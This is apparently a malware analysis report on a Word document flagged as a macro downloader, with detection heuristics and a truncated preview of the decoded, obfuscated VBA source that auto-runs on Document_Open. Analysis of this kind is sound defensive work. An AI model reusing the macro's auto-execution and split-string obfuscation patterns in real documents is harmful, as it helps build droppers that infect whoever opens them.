MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that are auto-executed via the Document_Open subroutine. These macros utilize CreateObject to interact with WMI (Win32_Process.Create) to launch a process, indicating a downloader or dropper functionality. The obfuscation technique of splitting keywords like 'winmgmts' is also present. The overall intent is to execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7444821-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7444821-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7717 bytes |
SHA-256: 9f45d91b112f636f0c228006fe08c37ae4140a8042637318e1af84b4433b9dc1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wagztsjfd"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Qwwetdrcvp, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Tfmpmgdfzndpn = Ioivjrbhyvl To 0
Bqxnsxgql = (13 - Atn(51) - (44 + Round(41) * Kmmigzlogio / CInt(1)))
Select Case Vkgryotalyei
Case Wpqzxwrlxfs
Kxovmbdriqosx = CLng(Yniaqioypir)
Knbzxpjc = Oct(Rgmyoybh)
Case Amjwsjqvyzmuj
Uopuioock = Dkzznbrucxde
Yodxqxxmrtk = Int(29)
End Select
Next
For Riftpzocldpxh = Ogzliteb To 0
Iqeijpoe = (13 - Atn(51) - (44 + Round(41) * Avmpnmmbntn / CInt(1)))
Select Case Csqoaqdmgk
Case Ikubnaszc
Ujxwhcocntgb = CLng(Boneetltifbs)
Svpibzwfcuwjs = Oct(Ncieimmeu)
Case Haasupcpj
Xaqwvlti = Dovctorm
Vkuswekzhgc = Int(29)
End Select
Next
For Qqfvvtyjok = Mtvfnzsip To 0
Ehgpswpck = (13 - Atn(51) - (44 + Round(41) * Vjuwowhow / CInt(1)))
Select Case Hommtjyohu
Case Bnpdfnziwv
Mkrkvbbcyuzsc = CLng(Gdwfkezt)
Scbxanlgoaisn = Oct(Tolgnwbzk)
Case Zqwtmrik
Zfyhologuopez = Omudqcrdvnv
Nrjdohtimzzl = Int(29)
End Select
Next
Bscznrplehwjd
End Sub
Attribute VB_Name = "Pqjdkknby"
Attribute VB_Base = "0{2C22C4B7-4639-4BBE-9D78-D3676BB828F5}{35E6C8EC-C98F-4AC0-A94C-C0B029C89273}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Emvyafspae"
Function Efnjmzodrx()
For Doirohma = Ogjlnxflfy To 0
Xcfrzedpcsps = (13 - Atn(51) - (44 + Round(41) * Rkrrtvfhejaat / CInt(1)))
Select Case Rjwgkqglwhi
Case Gvqqpogu
Fznqxvqylya = CLng(Tmlilyvjlz)
Jtklezuy = Oct(Hwaiqgjxxcv)
Case Eeguwxetzkpoc
Gzfmncfohch = Nbaewvgh
Yaqxhmlu = Int(29)
End Select
Next
Wibplufxkts = Wagztsjfd.Qwwetdrcvp
For Vgkppmzpxvlgd = Oynhnwkh To 0
Abtrdrbln = (13 - Atn(51) - (44 + Round(41) * Kdkwvpsy / CInt(1)))
Select Case Llhivxhcck
Case Iolgytdju
Yeuckrhsiju = CLng(Lihuujkwedv)
Pryvksvvie = Oct(Wkvrqwoyvupm)
Case Lesuazgycpu
Cuudegaxypfng = Pucmlvgqdodbn
Fxcxmdbrkf = Int(29)
End Select
Next
Oylgtquhlqijx = Wibplufxkts + Pqjdkknby.Eslptoofve + Pqjdkknby.Wlfyexcmzlicu + Pqjdkknby.Tuqcssvzezdro
For Jorsjreud = Fglwvkkzlp To 0
Xncrpwkuqepij = (13 - Atn(51) - (44 + Round(41) * Mstvqdlvso / CInt(1)))
Select Case Pxslrnque
Case Oxtgtbqdngxyg
Ftlrjdlouxxt = CLng(Suiftfxwxsub)
Brymtxiximx = Oct(Jyivhtiu)
Case Snmwjwsxirt
Ylzzlvmv = Bnxoxmicwpbgy
Zapppejx = Int(29)
End Select
Next
Aowtcdjn = Oylgtquhlqijx + Pqjdkknby.Zqahvjkbqcjxh + Pqjdkknby.Ispriflbv.ControlTipText
For Dcgphmqo = Smrejfzeomyd To 0
Uausunlcbo = (13 - Atn(51) - (44 + Round(41) * Lccqrssohucsv / CInt(1)))
Select Case Unpbzwvug
Case Tfiqkdqmtwbyv
Qeaybwegro = CLng(Oaqivyszmf)
Yciwktptvn = Oct(Uiqbozrbyqb)
Case Ofzchzkn
Zoivxzsrauznn = Knooliavswn
Oouddjqnfdt = Int(29)
End Select
Next
Efnjmzodrx = Dlrdginaylgh + Aowtcdjn + Dlrdginaylgh
For Lbrmlzjpek = Nmkgehzx To 0
Vsxlufobvgilc = (13 - Atn(51) - (44 + Round(41) * Ecaycyrqytm / CInt(1)))
Select Case Yglxkmfyozed
Case Ooscjtpa
Zyzeczsiatcpu = CLng(Qlspdvua)
Cfrckeyb = Oct(Mnbwphwdhazth)
Case Ixkbeexdbzua
Odohmndkwaw = Tudixpjchnzi
Jzwugrmtwll = Int(29)
End Select
Next
End Function
Function Bscznrplehwjd()
For Lntjuhtlfnruk = Xpexedzgot To 0
Ktpksdp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.